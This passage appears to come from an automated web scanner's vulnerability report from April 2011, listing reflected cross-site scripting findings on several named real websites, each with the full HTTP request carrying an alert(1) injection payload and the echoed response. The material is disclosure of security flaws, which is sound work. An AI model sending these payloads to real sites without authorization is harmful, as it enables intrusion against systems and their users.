SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:20:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/customer-service/order-info.aspx?8613a"style="x:expression(alert(1))"bb1d1f56e32=1'); return false;" >
...[SNIP]...

5.183. http://widget.needle.itasoftware.com/widget/Matrix2.do [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.needle.itasoftware.com
Path:   /widget/Matrix2.do

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2ebca<script>alert(1)</script>6a2cf77656a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/Matrix2.do?domain=us-festivals&mode=concise&lat=25.7933333&long=-80.290556&startDate=4/30/2011&endDate=5/18/2011&callback=itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a HTTP/1.1
Host: widget.needle.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:01:30 GMT
Server: Apache
Cache-Control: max-age=3600, public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text;charset=UTF-8
Set-Cookie: JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader; Path=/; Domain=.internal.itasoftware.com; HttpOnly
Content-Length: 91171

itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a({"results":[["The 16th Annual National Children\'s Theatre Festival","16th annual national childrens theatre festival the",[[["Actors\' Playhouse at the Miracle Theatre","actors playhouse at the mirac
...[SNIP]...

5.184. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 67881<script>alert(1)</script>d4ca36e90c2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 26 Apr 2011 19:09:51 GMT
Via: NS-CACHE: 100
Etag: "e28d056865b0e17fb91457313fb6a41551be8911"
Content-Length: 186
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 26 Apr 2011 19:19:50 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2", "diggs": 0});

5.185. http://widgetserver.com/syndication/subscriber/InsertPanel.js [panelId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetserver.com
Path:   /syndication/subscriber/InsertPanel.js

Issue detail

The value of the panelId request parameter is copied into the HTML document as plain text between tags. The payload d0616<script>alert(1)</script>374cd424dc0 was submitted in the panelId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0 HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:46:17 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 6119

//
//
//
if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"48996",urls:{runtimeBaseU
...[SNIP]...
</div>");

function libReadyCallback() {
var parent_node = document.getElementById(parentNodeId);
WIDGETBOX.subscriber.Main.insertPanel("0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0", parent_node);
}

WIDGETBOX.load("subscriber.Main", libReadyCallback, true);
//
})();

//EOF: subscriber/InsertPanel.js

5.186. http://www.allpages.com/ [980251%22';944334 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.allpages.com
Path:   /

Issue detail

The value of the 980251%22';944334 request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5aa12(a)acca7f1048c was submitted in the 980251%22';944334 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?980251%22';9443345aa12(a)acca7f1048c HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48782

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
-
google_ad_client = "pub-9391190101442052";
/* 468x15 - www, created 4/1/11 */
google_ad_slot = "1086959395";
google_ad_width = 468;
google_ad_height = 15;
google_hints = ', , ?980251%22';9443345aa12(a)acca7f1048c';
//-->
...[SNIP]...

5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.allpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84a26(a)d3d1371b61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?980251%22';944334&84a26(a)d3d1371b61f=1 HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48787

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
google_ad_client = "pub-9391190101442052";
/* 468x15 - www, created 4/1/11 */
google_ad_slot = "1086959395";
google_ad_width = 468;
google_ad_height = 15;
google_hints = ', , ?980251%22';944334%2684a26(a)d3d1371b61f=1';
//-->
...[SNIP]...

5.188. http://www.aptm.phoenix.edu/ [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68743"%3balert(1)//bb61ffcaafd was submitted in the channel parameter. This input was echoed as 68743";alert(1)//bb61ffcaafd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743"%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:47 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135047407.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: vid=51921951; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: plid=47054; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44264

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!--
       setDestURLExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr68743";alert(1)//bb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&
...[SNIP]...

5.189. http://www.aptm.phoenix.edu/ [classification parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the classification request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e94"%3balert(1)//5616609a231 was submitted in the classification parameter. This input was echoed as 86e94";alert(1)//5616609a231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply86e94"%3balert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:49 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809677.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: vid=51922085; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
7_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply86e94";alert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
   
...[SNIP]...

5.190. http://www.aptm.phoenix.edu/ [creative_desc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the creative_desc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d075"%3balert(1)//51083a8fbe0 was submitted in the creative_desc parameter. This input was echoed as 7d075";alert(1)//51083a8fbe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075"%3balert(1)//51083a8fbe0&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:18 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809621.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: vid=51921737; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
LExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075";alert(1)//51083a8fbe0&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal
...[SNIP]...

5.191. http://www.aptm.phoenix.edu/ [creative_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the creative_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6605f"%3balert(1)//45adfdbe294 was submitted in the creative_id parameter. This input was echoed as 6605f";alert(1)//45adfdbe294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=389543536605f"%3balert(1)//45adfdbe294&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:33 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048385.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: vid=51922369; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:40 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!--
       setDestURLExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=389543536605f";alert(1)//45adfdbe294&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&addre
...[SNIP]...

5.192. http://www.aptm.phoenix.edu/ [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0ef"%3balert(1)//b7cd0810838 was submitted in the destination parameter. This input was echoed as 6b0ef";alert(1)//b7cd0810838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm6b0ef"%3balert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:07 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134808988.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: vid=51922145; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:14 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
gn_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm6b0ef";alert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect
...[SNIP]...

5.193. http://www.aptm.phoenix.edu/ [distribution parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the distribution request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff562"%3balert(1)//f7e8dbd9af9 was submitted in the distribution parameter. This input was echoed as ff562";alert(1)//f7e8dbd9af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
